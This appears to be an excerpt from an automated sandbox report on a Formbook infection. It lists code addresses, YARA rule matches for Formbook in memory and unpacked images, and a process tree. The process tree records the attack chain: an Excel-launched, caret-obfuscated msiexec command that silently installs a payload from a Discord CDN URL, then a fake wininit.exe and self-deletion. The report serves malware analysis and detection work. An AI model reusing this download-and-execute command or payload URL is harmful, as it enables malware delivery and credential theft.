9_2_02232E2F |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0221EE4C |
9_2_0221EE4C |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_02210F3F |
9_2_02210F3F |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0222DF7C |
9_2_0222DF7C |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_02230D3B |
9_2_02230D3B |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0220CD5B |
9_2_0220CD5B |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0229FDDD |
9_2_0229FDDD |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0009E071 |
9_2_0009E071 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_0009E5FC |
9_2_0009E5FC |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_00082D87 |
9_2_00082D87 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_00082D90 |
9_2_00082D90 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_00089E30 |
9_2_00089E30 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_00082FB0 |
9_2_00082FB0 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024E9862 |
9_2_024E9862 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024E1069 |
9_2_024E1069 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024E1072 |
9_2_024E1072 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024E8132 |
9_2_024E8132 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024EDA6F |
9_2_024EDA6F |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024EAA32 |
9_2_024EAA32 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024EDB0E |
9_2_024EDB0E |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024E5B1F |
9_2_024E5B1F |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024E5B22 |
9_2_024E5B22 |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024E2CEC |
9_2_024E2CEC |
Source: C:\Windows\SysWOW64\wininit.exe |
Code function: 9_2_024E2CF2 |
9_2_024E2CF2 |
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn |
|
Source: unknown |
Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp |
|
Source: C:\Windows\Installer\MSID8B1.tmp |
Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp |
|
Source: C:\Windows\Installer\MSID8B1.tmp |
Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe |
|
Source: C:\Windows\SysWOW64\wininit.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp' |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn |
Jump to behavior |
Source: C:\Windows\Installer\MSID8B1.tmp |
Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp |
Jump to behavior |
Source: C:\Windows\Installer\MSID8B1.tmp |
Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe |
Jump to behavior |
Source: C:\Windows\SysWOW64\wininit.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp' |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Installer\MSID8B1.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Installer\MSID8B1.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Installer\MSID8B1.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Installer\MSID8B1.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Installer\MSID8B1.tmp |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\wininit.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |